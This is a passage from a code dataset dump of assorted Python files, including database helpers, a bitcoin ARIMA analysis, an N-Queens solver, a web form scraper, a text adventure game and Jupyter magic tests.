[r,y,t]):\n print(\"ESTÁ contido\")\nelse:\n print(\"NÃO está contido\")\n\"\"\"\ncores = ['azul', 'amarelo', 'red', 'green', 'black', 'branco']\nwhile True:\n valor = input(\"Digite o nome de uma cor ou 0 para sair: \")\n\n if(valor == '0'):\n break\n if valor in cores:\n print(\"A cor \", valor, \"Esta cor está contida\")\n print()\n else:\n print(\"Não está contida\")","sub_path":"Python_47_pratico_in/pratico_in.py","file_name":"pratico_in.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"316455140","text":"import datetime\n\nfrom app import app_db\n\nfrom uuid import uuid4\n\n\ndef get(model, **kwargs):\n return app_db.session.query(model).filter_by(**kwargs).first()\n\n\ndef get_list(model, **kwargs):\n sort_by = kwargs.pop('sort_by', 'created_at')\n limit = kwargs.pop('limit', None)\n desc = kwargs.pop('desc', True)\n published = kwargs.pop('published', True)\n items = app_db.session.query(model).filter_by(**kwargs)\n if published and hasattr(model, 'published'):\n items = items.filter_by(published=published)\n if hasattr(model, sort_by):\n order_by = getattr(model, sort_by)\n if desc:\n items = items.order_by(order_by.desc().nullslast())\n else:\n items = items.order_by(order_by.asc().nullslast())\n items = items.limit(limit)\n return items.all()\n\n\ndef save(obj, refresh=True):\n obj = app_db.session.merge(obj)\n app_db.session.commit()\n\n if refresh:\n app_db.session.refresh(obj)\n\n return obj\n\n\ndef publish(obj):\n update(obj, {'publish`': True})\n save(obj)\n\n\ndef delete(obj, hard_delete=False):\n app_db.session.delete(obj)\n app_db.session.commit()\n\n\ndef update(obj, data):\n changed = False\n\n for field, val in data.items():\n if hasattr(obj, field):\n setattr(obj, field, val)\n changed = True\n\n if changed:\n return save(obj)\n\n return obj\n\n\ndef next_uuid(model, current_item, sort_by='created_at', published=True):\n items = get_list(model, published=published, sort_by=sort_by, desc=False)\n try:\n index = [index for index, item in enumerate(items) if item.uuid == current_item.uuid][0]\n except:\n next_uuid = None\n else:\n next_uuid = items[index + 1].uuid if index < len(items) - 1 else None\n\n return next_uuid\n\n\ndef prev_uuid(model, current_item, sort_by='created_at', published=True):\n items = get_list(model, published=published, sort_by=sort_by, desc=False)\n try:\n index = [index for index, item in enumerate(items) if item.uuid == current_item.uuid][0]\n except:\n prev_uuid = None\n else:\n prev_uuid = items[index - 1].uuid if index > 0 else None\n\n return prev_uuid\n\n\ndef create(model, **kwargs):\n m = model()\n if hasattr(m, 'uuid'):\n m.uuid = str(uuid4())\n if hasattr(m, 'created_at'):\n m.created_at = datetime.datetime.utcnow()\n for k, v in kwargs.items():\n if hasattr(m, k):\n setattr(m, k, v)\n\n return save(m)\n","sub_path":"app/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585447639","text":"# -*- coding: utf-8 -*-\n\n\n# Import libraries\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy import stats\nimport statsmodels.api as sm\nimport warnings\nfrom itertools import product\nfrom datetime import datetime\nimport os\n\nos.chdir(\"./data/\")\n#from scipy import pearsonr\nwarnings.filterwarnings('ignore')\nplt.style.use('seaborn-poster')\n\n# Load data\ndf = pd.read_csv('btceUSD_1-min_data_2012-01-01_to_2017-05-31.csv')\n#df = pd.read_csv('btcnCNY_1-min_data_2012-01-01_to_2017-05-31.csv') #\n#df = pd.read_csv('krakenEUR_1-min_data_2014-01-08_to_2017-05-31.csv')\n\ndf.head()\nprint(df.dtypes)\n\n#c = pd.DataFrame(columns = df.Open, index = a.columns)\n#\n#for col in c.columns:\n# for idx in c.index:\n# correl_signif = pearsonr(a[col], b[idx])\n# correl = correl_signif[0]\n# c.loc[idx, col] = correl\n# Unix-time to \ndf.Timestamp = pd.to_datetime(df.Timestamp, unit='s')\n\n# Resampling to daily frequency\ndf.index = df.Timestamp\ndf = df.resample('D').mean()\n\n# Resampling to monthly frequency\ndf_month = df.resample('M').mean()\n\n# Resampling to annual frequency\ndf_year = df.resample('A-DEC').mean()\n\n# Resampling to quarterly frequency\ndf_Q = df.resample('Q-DEC').mean()\n\n\n# PLOTS\nfig = plt.figure(figsize=[15, 7])\nplt.suptitle('Bitcoin exchanges, mean USD', fontsize=22)\n\nplt.subplot(221)\nplt.plot(df.Weighted_Price, '-', label='By Days')\nplt.legend()\n\nplt.subplot(222)\nplt.plot(df_month.Weighted_Price, '-', label='By Months')\nplt.legend()\n\nplt.subplot(223)\nplt.plot(df_Q.Weighted_Price, '-', label='By Quarters')\nplt.legend()\n\nplt.subplot(224)\nplt.plot(df_year.Weighted_Price, '-', label='By Years')\nplt.legend()\n\n# plt.tight_layout()\nplt.show()\n\n\n\nplt.figure(figsize=[15,7])\nsm.tsa.seasonal_decompose(df_month.Weighted_Price).plot()\nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.Weighted_Price)[1])\nplt.show()\n\n\n\n# Box-Cox Transformations\ndf_month['Weighted_Price_box'], lmbda = stats.boxcox(df_month.Weighted_Price)\nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.Weighted_Price)[1])\n\n\n# Seasonal differentiation\ndf_month['prices_box_diff'] = df_month.Weighted_Price_box - df_month.Weighted_Price_box.shift(12)\nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.prices_box_diff[12:])[1])\n\n\n# Regular differentiation\ndf_month['prices_box_diff2'] = df_month.prices_box_diff - df_month.prices_box_diff.shift(1)\nplt.figure(figsize=(15,7))\n\n# STL-decomposition\nsm.tsa.seasonal_decompose(df_month.prices_box_diff2[13:]).plot() \nprint(\"Dickey–Fuller test: p=%f\" % sm.tsa.stattools.adfuller(df_month.prices_box_diff2[13:])[1])\n\nplt.show()\n\n\n# Initial approximation of parameters using Autocorrelation and Partial Autocorrelation Plots\nplt.figure(figsize=(15,7))\nax = plt.subplot(211)\nsm.graphics.tsa.plot_acf(df_month.prices_box_diff2[13:].values.squeeze(), lags=48, ax=ax)\nax = plt.subplot(212)\nsm.graphics.tsa.plot_pacf(df_month.prices_box_diff2[13:].values.squeeze(), lags=48, ax=ax)\nplt.tight_layout()\nplt.show()","sub_path":"btc/arima_example.py","file_name":"arima_example.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"477839549","text":"# Python program to solve N Queen Problem using backtracking\n\nglobal N\nN = 4\n\n\n# A utility function to check if a queen can be placed on board[row][col]. Note that this\n# function is called when \"col\" queens are already placed in columns from 0 to col -1.\n# So we need to check only left side for attacking queens\n\n\ndef is_safe(board, row, col):\n # Check this row on left side\n for i in range(col):\n if board[row][i] == 1:\n return False\n\n # Check upper diagonal on left side\n for i, j in zip(range(row, -1, -1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n # Check lower diagonal on left side\n for i, j in zip(range(row, N, 1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n\n return True\n\n\ndef solve_n_queen(board, col):\n # base case: If all queens are placed then return true\n if col >= N:\n return True\n\n # Consider this column and try placing this queen in all rows one by one\n for row in range(N):\n\n if is_safe(board, row, col):\n # Place this queen in board[row][col]\n board[row][col] = 1\n\n # recur to place rest of the queens\n if solve_n_queen(board, col + 1):\n return True\n\n # If placing queen in board[row][col] doesn't lead to a solution, then queen from board[i][col]\n board[row][col] = 0\n\n # if the queen can not be placed in any row in this column col then return false\n return False\n\n\ndef solve_NQ():\n board = [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0]\n ]\n\n if not solve_n_queen(board, 0):\n print(\"Solution does not exist\")\n return False\n\n print(board)\n return True\n\n\nsolve_NQ()\n","sub_path":"back_tracking/N_queen-problem.py","file_name":"N_queen-problem.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"80804636","text":"import numpy as np\nfrom rlberry.envs.benchmarks.ball_exploration import PBall2D\n\n\np = 5\nA = np.array([\n [1.0, 0.1],\n [-0.1, 1.0]\n]\n)\n\nreward_amplitudes = np.array([1.0, 0.5, 0.5])\nreward_smoothness = np.array([0.25, 0.25, 0.25])\n\nreward_centers = [\n np.array([0.75 * np.cos(np.pi / 2), 0.75 * np.sin(np.pi / 2)]),\n np.array([0.75 * np.cos(np.pi / 6), 0.75 * np.sin(np.pi / 6)]),\n np.array([0.75 * np.cos(5 * np.pi / 6), 0.75 * np.sin(5 * np.pi / 6)])\n]\n\naction_list = [0.1 * np.array([1, 0]),\n -0.1 * np.array([1, 0]),\n 0.1 * np.array([0, 1]),\n -0.1 * np.array([0, 1])]\n\nenv = PBall2D(p=p, A=A,\n reward_amplitudes=reward_amplitudes,\n reward_centers=reward_centers,\n reward_smoothness=reward_smoothness,\n action_list=action_list)\n\nenv.enable_rendering()\n\nfor ii in range(100):\n env.step(1)\n env.step(3)\n\nenv.render()\n","sub_path":"examples/demo_pball.py","file_name":"demo_pball.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"466744078","text":"class Data(object):\n def __init__(self):\n self.catchable_pokemon = []\n self.nearby_pokemon = []\n self.wild_pokemon = []\n self.decimated_spawn_points = []\n self.spawn_points = []\n self.fort_summaries = []\n self.forts = []\n\n\nclass Player(object):\n def __init__(self, latitude, longitude, altitude):\n self.lat = latitude\n self.lon = longitude\n self.alt = altitude\n","sub_path":"utils/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"505466356","text":"import os\nimport io\nimport tarfile\n\n\ndef create_tar(path):\n fileobj = io.BytesIO()\n tar = tarfile.open(mode='w:gz', fileobj=fileobj)\n\n for root, dirs, files in os.walk(path):\n for fn in files:\n p = os.path.join(root, fn)\n\n # remove one more character to remove trailing slash\n arcname = p[p.find(path)+len(path)+1:]\n\n if not arcname.startswith('.nova/config'):\n tar.add(p, arcname=arcname)\n\n tar.close()\n return fileobj\n\n\ndef extract_tar(fileobj, path):\n fileobj.seek(0)\n tar = tarfile.open(mode='r:gz', fileobj=fileobj)\n tar.extractall(path)\n tar.close()\n","sub_path":"nova/memtar.py","file_name":"memtar.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"648609191","text":"import os\nfrom setuptools import setup, find_packages\n\ntry:\n import pypandoc\n long_description = pypandoc.convert('README.md', 'rst')\nexcept:\n long_description = \"\"\"\n Forked from https://github.com/FaBoPlatform/FaBo9AXIS-MPU9250-Python .\n Changes are meant to enable Python 3 support. \n Original package is called `FaBo9Axis_MPU9250`.\n Author of original package: FaBo\"\"\"\n\nclassifiers = ['Development Status :: 4 - Beta',\n 'Operating System :: POSIX :: Linux',\n 'License :: OSI Approved :: Apache Software License',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3',\n 'Topic :: Software Development',\n 'Topic :: System :: Hardware']\n\nsetup(\n name='FaBo9Axis_MPU9250_Python3',\n version='1.0.3',\n author='RandomUser1',\n description=\"Fork of `FaBo9Axis_MPU9250`. This is a library for the FaBo 9AXIS I2C Brick.\",\n long_description=long_description,\n url='https://github.com/piotrek-k/FaBo9AXIS-MPU9250-Python3',\n license='Apache License 2.0',\n classifiers=classifiers,\n packages=find_packages(),\n install_requires=[\n 'smbus'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"502329069","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n'''\n题目:有一个已经排好序的数组。\n现输入一个数,要求按原来的规律将它插入数组中\n\n程序分析:首先判断此数是否大于最后一个数,\n然后再考虑插入中间的数的情况,插入后此元素之后的数,依次后移一个位置。\n'''\n#方法1\nL = [1, 2, 3, 4, 5]\na = 2\nif a >= L[len(L) - 1]:\n L.append(a)\n print(L)\nelif a <= L[0]:\n L.insert(0, a)\n print(L)\nelse:\n for i in range(2, len(L) - 1):\n if a >= i and a <= i + 1:\n L.insert(i, a)\n print(L)\n\n#方法2\nL=[1,3,5,7,8]\na=2\nL.append(a)\nL.sort()\nprint(L)\n","sub_path":"python-039.py","file_name":"python-039.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"519119278","text":"\"\"\"\nModule defines Scraper Base Class\n\"\"\"\nfrom .form_instructions import FormInstructions, ValueClass\nfrom selenium.webdriver import Chrome, Firefox\nfrom selenium.webdriver.support.ui import Select\nfrom toolz import curry\nfrom typing import List, Union\nfrom bs4 import BeautifulSoup\n\n#class ValueClass(NamedTuple):\n# xpath: str\n# values: Union[str, Sequence[str]]\n# form_element_type: str\n# allow_multiple: bool\n\ndef _scrape_make_soup(html_:str, storage_path:str)->None:\n soup = BeautifulSoup(str)\n return soup\n\n\nclass Scraper:\n\n def __init__(self, url:str, instructions: FormInstructions, browser:Union[Chrome, Firefox]):\n self._instructions = instructions\n self._form_ids_base = instructions.get_form_ids_values()\n self._total_instr = []\n self.browser = browser\n self.url = url\n self.final_instruction_plan = self._build_exec_plan()\n\n def _get_single_entries_for_form(self)->List[ValueClass]:\n return [v for v in self._form_ids_base if v.values is str or v.allow_multiple is True]\n\n def _get_multiple_entries_for_form(self):\n return [v for v in self._form_ids_base if v.allow_multiple is False]\n\n def _expand_value_class(self, vc:ValueClass)->List[ValueClass]:\n @curry\n def make_value_class(xpath, form_element_type, allow_multiple, values):\n return ValueClass(xpath, values, form_element_type, allow_multiple)\n\n xpath, values, form_element_type, _ = vc\n make_value = make_value_class(xpath, form_element_type, False)\n return [make_value(v) for v in values]\n\n def _merge_single_with_expanded_vc(self, sl: List[ValueClass], xl: List[ValueClass])->List[List[ValueClass]]:\n def b(s1, vc):\n if sl:\n return sl.extend(vc)\n else:\n return [vc]\n return [b(sl,vc) for vc in xl]\n\n def _build_exec_plan(self):\n # Step 1 -> extract isolate single value from multiple values\n single_entries = self._get_single_entries_for_form()\n # Step 2 -> extract multiple entries\n multiple_entries = self._get_multiple_entries_for_form()\n #TODO -> scale up if multiple single dropdowns - not a problem for now to solve\n # Step 3 -> extract to list ValueClass\n exploded_entries = self._expand_value_class(multiple_entries[0]) #TODO-> clean_up\n #Step 4 put together everything\n final_out_put = self._merge_single_with_expanded_vc(single_entries, exploded_entries)\n return final_out_put\n\n def _navigate_to_url(self):\n self.browser.get(self.url)\n\n def _populate_form(self, vcl: List[ValueClass]):\n '''Refactor'''\n# self._navigate_to_url()\n# for vc in self.final_instruction_plan[-1]:\n for vc in vcl:\n if vc.form_element_type == 'select':\n if vc.allow_multiple:\n #TODO -> build this\n pass\n else:\n element = Select(self.browser.find_element_by_xpath(vc.xpath))\n element.select_by_value(vc.values)\n #Completed form entry -> Bare bones for scenario 1\n# print(self._instructions.get_submit_id())\n# submit = self.browser.find_element_by_xpath(self._instructions.get_submit_id())\n# submit.click()\n html_ = self.browser.page_source\n #scrape_table(html)\n\n def collect_base_htmls(self):\n import time\n self._navigate_to_url()\n print('navigated')\n all_html = []\n for vc in self.final_instruction_plan:\n print(vc, type(vc))\n print(self.browser.current_url)\n assert self.url == self.browser.current_url\n self._populate_form(vc)\n submit = self.browser.find_element_by_xpath(self._instructions.get_submit_id())\n submit.click()\n time.sleep(2)\n #TODO Terrible Code -> need more resiliency... wrap in retry decorator -> think hwo to write results one at time\n if self.url != self.browser.current_url:\n print('catching my breath')\n time.sleep(5)\n self.browser.back()\n time.sleep(2)\n self._populate_form(vc)\n submit = self.browser.find_element_by_xpath(self._instructions.get_submit_id())\n submit.click()\n time.sleep(2)\n html_ = self.browser.page_source\n all_html.append(html_) #TODO would like to capture dates\n print(self.url)\n time.sleep(5) #Site must be throttled -> Wait between each call\n self.browser.back()\n return all_html\n\n def __str__(self):\n return 'a_string' #TODO\n\n","sub_path":"screenscraping/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"118361250","text":"fistList = [12,3,53,2,33,55]\r\nsecondList = [6,4,76,33,66,77]\r\n\r\n#declare one 3rd list to store \r\nthirdList = []\r\n\r\nfor num in fistList:\r\n if num % 2 != 0:\r\n thirdList.append(num)\r\n\r\nfor num in secondList:\r\n if num % 2 == 0:\r\n thirdList.append(num)\r\n\r\nprint(\"Third list is : \", thirdList)","sub_path":"python/activity_9.py","file_name":"activity_9.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"370796865","text":"# coding=utf-8\n__author__ = 'Tang'\n\nimport lib.xmltodict as xmltodict\nimport unittest\n\n\nclass PatentFileException(Exception):\n \"\"\"Raised when file is empty\"\"\"\n def __init__(self, filename):\n self.filename = filename\n\n\nclass Patent:\n \"\"\"Patent data as extracted from XML\"\"\"\n def __init__(self, filename):\n with open(filename, 'r') as infile:\n data = infile.read().replace('\\n', '')\n if data is not None:\n temp_dict = xmltodict.parse(data)\n self.dict = dict()\n for each in temp_dict['doc']['str']:\n if u'#text' in each.keys() and u'#text' in each.keys():\n self.dict[each[u'@name']] = each[u'#text']\n else:\n raise PatentFileException(filename)\n\n def get_data(self):\n return self.dict\n\n\nclass TestPatentClass(unittest.TestCase):\n\n def test_read_patent(self):\n with open(\"tests/json/patent_class_test1.txt\", 'r') as infile:\n output = infile.read().replace('\\n', '')\n p = Patent(\"corpus/patsnap-corpus/EP0049154B2.xml\")\n self.assertEqual(output, str(p.get_data()))\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"patent.py","file_name":"patent.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"453234765","text":"#!/usr/bin/python\n__author__ = \"Vishal Jasrotia. Stony Brook University\"\n__copyright__ = \"\"\n__license__ = \"GPL\"\n__version__ = \"1.0\"\n__maintainer__ = \"Vishal Jasrotia\"\n__email__ = \"jasrotia.vishal@stonybrook.edu\"\n__status__ = \"\"\n\nimport os, sys\nfrom linklist import Node\n\n\na = Node(1 ,None)\nb = Node(2 ,a)\nc = Node(3 ,b)\nd = Node(4 ,c)\ne = Node(5 ,d)\nf = Node(6 ,e)\ng = Node(7 ,f)\nh = Node(8 ,g)\ni = Node(9 ,h)\nj = Node(10 ,i)\nk = Node(11 ,j)\nl = Node(12 ,k)\nm = Node(13 ,l)\nn = Node(14 ,m)\n\n\n#create circle \na.setNext(h)\n\nprint(a)\nslowtemp = n\nfasttemp = n\n#detect and print \nwhile fasttemp is not None and fasttemp.getNext() is not None :\n sys.stdout.write(\"%d\"%slowtemp.getData())\n slowtemp = slowtemp.getNext()\n fasttemp = fasttemp.getNext().getNext()\n if slowtemp is not None:\n sys.stdout.write(\" -> \")\n\n if slowtemp == fasttemp:\n print(\"cycle detected in system at %d.\"%slowtemp.getData())\n break\n\nslowtemp = n\nwhile slowtemp is not None and fasttemp is not None:\n slowtemp = slowtemp.getNext()\n fasttemp = fasttemp.getNext()\n if slowtemp ==fasttemp:\n print(\"cycle starts from node with data %d\"%fasttemp.getData())\n break\n\n","sub_path":"Chapter 3 linklist/floycyclefindalgo.py","file_name":"floycyclefindalgo.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"437350345","text":"import numpy as np\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nimport rlkit.torch.pytorch_util as ptu\nimport torch\nfrom gym.envs.mujoco import PusherEnv, AntEnv, HalfCheetahEnv, HumanoidStandupEnv\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom torch.optim import Adam\nfrom torch import nn\n\nfrom rlkit.torch.core import PyTorchModule\nfrom rlkit.torch.networks import Mlp, OuterProductFF\n\nplt.ion()\n\n# env = PusherEnv()\n# joint_slice = slice(None, 7)\n# joint_name = 'tips_arm'\n\nenv = HalfCheetahEnv()\njoint_slice = slice(None, 7)\njoint_name = 'ffoot'\n\n# env = HumanoidStandupEnv()\n# joint_slice = slice(None, None)\n# joint_name = 'right_foot'\n\n# env = AntEnv()\n# joint_slice = slice(2, 13)\n# joint_name = 'aux_4'\n\nN_PATHS = 1000\nN_PATHS_TEST = N_PATHS\nPATH_LENGTH = 10\nN_EPOCHS = 50\n\n\ndef generate_data(n_paths, path_length):\n joint_angles = []\n # jacobians = []\n states = []\n actions = []\n next_states = []\n for i in range(n_paths):\n state = env.reset()\n # tip_arm_jac = env.sim.data.get_body_jacp(joint_name)\n for _ in range(path_length):\n joint_angles.append(state[joint_slice])\n # jacobians.append(tip_arm_jac)\n states.append(state)\n action = env.action_space.sample()\n state, *_ = env.step(action)\n actions.append(action)\n next_states.append(state)\n # tip_arm_jac = env.sim.data.get_body_jacp(joint_name)\n # return np.array(joint_angles), np.array(jacobians)\n return (\n np.hstack((np.array(states), np.array(actions))),\n np.array(next_states) - np.array(states)\n )\n\n\ntrain_x_np, train_y_np = generate_data(N_PATHS, PATH_LENGTH)\ntest_x_np, test_y_np = generate_data(N_PATHS_TEST, PATH_LENGTH)\ntrain_x = ptu.np_to_var(train_x_np)\ntrain_y = ptu.np_to_var(train_y_np)\ntest_x = ptu.np_to_var(test_x_np)\ntest_y = ptu.np_to_var(test_y_np)\n\ntrain_dataset = TensorDataset(\n ptu.FloatTensor(train_x_np),\n ptu.FloatTensor(train_y_np),\n)\nin_dim = train_x_np[0].size\nout_dim = train_y_np[0].size\ndataloader = DataLoader(train_dataset, batch_size=32, shuffle=True)\n\n\ndef train_network(net, title):\n train_losses = []\n test_losses = []\n times = []\n\n optimizer = Adam(net.parameters(), lr=1e-3)\n criterion = nn.MSELoss()\n\n for i in range(N_EPOCHS):\n for i_batch, sample_batched in enumerate(dataloader):\n x, y = sample_batched\n x = ptu.Variable(x)\n y = ptu.Variable(y)\n y_hat = net(x)\n\n loss = criterion(y_hat, y)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n y_hat = net(test_x)\n test_loss = float(criterion(y_hat, test_y))\n test_losses.append(test_loss)\n\n y_hat = net(train_x)\n train_loss = float(criterion(y_hat, train_y))\n train_losses.append(train_loss)\n\n times.append(i)\n plt.gcf().clear()\n plt.plot(times, train_losses, '--')\n plt.plot(times, test_losses, '-')\n plt.title(title)\n plt.draw()\n plt.pause(0.05)\n print(title)\n print(\"\\tfinal train loss: {}\".format(train_loss))\n print(\"\\tfinal test loss: {}\".format(test_loss))\n\n\nclass JacobianNet(PyTorchModule):\n def __init__(\n self,\n hidden_sizes,\n output_size,\n input_size,\n init_w=3e-3,\n hidden_init=ptu.fanin_init,\n b_init_value=0.,\n ):\n super().__init__()\n\n self.input_size = input_size\n self.output_size = output_size\n self.fcs = []\n self.gates = []\n self.layer_norms = []\n in_size = input_size\n\n for i, next_size in enumerate(hidden_sizes):\n fc = nn.Linear(in_size, next_size)\n hidden_init(fc.weight)\n fc.bias.data.fill_(b_init_value)\n self.__setattr__(\"fc{}\".format(i), fc)\n self.fcs.append(fc)\n\n fc = nn.Linear(in_size, next_size)\n hidden_init(fc.weight)\n fc.bias.data.fill_(b_init_value)\n self.__setattr__(\"gate{}\".format(i), fc)\n self.gates.append(fc)\n\n in_size = next_size\n\n self.last_fc = nn.Linear(in_size, output_size)\n self.last_fc.weight.data.uniform_(-init_w, init_w)\n self.last_fc.bias.data.fill_(0)\n\n def forward(self, input, return_preactivations=False):\n h = input\n z = input\n for fc, gate in zip(self.fcs, self.gates):\n z = torch.sin(gate(z))\n h = fc(h) * z\n return self.last_fc(h)\n\n\ndef num_params(net):\n return nn.utils.parameters_to_vector(net.parameters()).shape[0]\n\nmean_y = np.mean(test_y_np, axis=0)\nprint(\"Mean y\", mean_y)\nprint(\"Constant error\", np.mean((test_y_np - mean_y)**2))\n\nplt.figure()\nmlp = Mlp(hidden_sizes=[100, 100], output_size=out_dim, input_size=in_dim)\n\nmlp_n_params = num_params(mlp)\n\nh_size = 100\njac_net = JacobianNet(hidden_sizes=[h_size, h_size], output_size=out_dim,\n input_size=in_dim)\n# keep # paramers ~ same\nwhile num_params(jac_net) > mlp_n_params:\n h_size -= 5\n jac_net = JacobianNet(hidden_sizes=[h_size, h_size], output_size=out_dim,\n input_size=in_dim)\nprint(\"jac_net h_size:\", h_size)\n\nlinear_net = Mlp(hidden_sizes=[], output_size=out_dim, input_size=in_dim)\n\n\nsin_mlp = Mlp(hidden_sizes=[100, 100], output_size=out_dim, input_size=in_dim,\n hidden_activation=torch.sin)\ntanh_mlp = Mlp(hidden_sizes=[100, 100], output_size=out_dim, input_size=in_dim,\n hidden_activation=torch.tanh)\nplt.figure()\ntrain_network(mlp, \"mlp [100, 100]\")\nplt.figure()\ntrain_network(jac_net, \"jac [{h_size}, {h_size}]\".format(h_size=h_size))\n# plt.figure()\n# train_network(linear_net, \"linear\")\n# plt.figure()\n# train_network(sin_mlp, \"sin [100, 100]\")\n# plt.figure()\n# train_network(tanh_mlp, \"tanh [100, 100]\")\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport ipdb; ipdb.set_trace()\n","sub_path":"experiments/vitchyr/one_offs/jacobian_regression.py","file_name":"jacobian_regression.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"261302806","text":"import json\nimport random\nfrom Functions.Attack import attack\nfrom Functions.Explore import explore\nfrom Functions.DescribeLocation import describelocation\nfrom Functions.Trapped import trapped\nfrom Functions.Movement import movecmd\n\n\ndef loadjson():\n with open('Dependents/player.json', 'r') as f: # Opens the player.json\n player = json.load(f)\n return player\n\n\ndef savejson():\n with open('Dependents/player.json', 'w') as f: # Saves any changes to localplayer to player.\n f.write(json.dumps(localplayer))\n\n\ndef export(x, y):\n with open(x + y +\".json\", 'w') as f: # Saves any changes to localplayer to player.\n f.write(json.dumps(localplayer))\n\nwith open('Dependents/encounters.json') as encounters:\n encounters = json.loads(encounters.read())\n\n\ncommands = (\"Explore\", \"Go\", \"Heal\", \"Inventory\", \"Exit\") # Available commands for the player to use.\nbreak_line = ('-' * 100)\n\n\nlocalplayer = loadjson()\nturn = 1\nloopx = True\nif turn <= 1:\n while loopx:\n if localplayer[\"player_health\"] <= 0:\n break\n print(\"Turn: \" + str(turn) + \"\\n\")\n describelocation()\n action = input(\"Input your command (\" + \", \".join(commands) + \"): \").lower().split()\n print('-' * 100)\n if any('explore' in s for s in action): # Explore command (Random encounter)\n explore()\n else: # Checks to see if there's any traps in the area after the explore function is used. If it isn't, the player is damaged.\n trapped()\n if any('go' in s for s in action): # Movement command (Sends player in the direction they input)\n action.remove('go')\n where = \"\".join(action)\n currentstate = localplayer[\"playerstate\"]\n if where in (\"north\", \"south\", \"east\", \"west\"):\n attacked = random.randint(1, 100)\n if attacked == 1:\n attack(\"Random\")\n else:\n localplayer[\"playerstate\"] = movecmd(where)\n if localplayer[\"playerstate\"] in encounters:\n status = attack(\"Encounter\")\n if status == \"Flee\":\n localplayer[\"playerstate\"] = currentstate\n elif status == \"Win\":\n from Functions.RewardPlayer import rewardplayer\n print(\"\\n\"\"You found a \" + rewardplayer() + \"!\" + \"\\n\"\"You put it away safely in your inventory\"\"\\n\")\n print(str(break_line))\n input(\"Press enter key to continue.\")\n del encounters[localplayer[\"playerstate\"]]\n else:\n print(\"\\n\"\"You have been defeated.\")\n localplayer[\"playerstate\"] = currentstate\n break\n else:\n print(\"Invalid selection. Please choose from North, South, East or West.\")\n # PUT NEW SHIT HERE:\n elif any('inventory' in s for s in action):\n from Functions.Inventory import inventory\n inventory()\n elif any('heal' in s for s in action): # Heal command (Heals player to full health, but takes as many turns as their health difference, random encounters can occur\n from Functions.PlayerHeal import playerheal\n playerheal()\n elif any('exit' in s for s in action): # Exports the player file\n location = input(\"Where do you want to save your file? \")\n name = input(\"What would you like to save your file as? \")\n export(location, name)\n break\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"475046790","text":"import os\nimport responses\nfrom unittest import mock\nfrom unittest import skipUnless\nfrom unittest.mock import patch, MagicMock\n\nfrom nextcode import jupyter\nfrom nextcode.exceptions import InvalidToken, InvalidProfile, ServerError\nfrom nextcode.services.query.exceptions import MissingRelations, QueryError\nfrom tests import BaseTestCase, REFRESH_TOKEN, AUTH_RESP, AUTH_URL\nfrom tests.test_query import ROOT_URL, ROOT_RESP\ntry:\n import pandas as pd\n from pandas import DataFrame\n PANDAS_INSTALLED = True\nexcept ModuleNotFoundError:\n PANDAS_INSTALLED = False\n\n\ndef setup_responses():\n responses.add(responses.POST, AUTH_URL, json=AUTH_RESP)\n responses.add(responses.GET, ROOT_URL, json=ROOT_RESP)\n\n\nclass JupyterTest(BaseTestCase):\n @responses.activate\n def setUp(self):\n super(JupyterTest, self).setUp()\n setup_responses()\n self.magics = jupyter.GorMagics()\n self.magics.shell = MagicMock()\n\n @responses.activate\n def test_basic_gor_magics(self):\n setup_responses()\n\n m = jupyter.GorMagics()\n m.handle_exception()\n\n 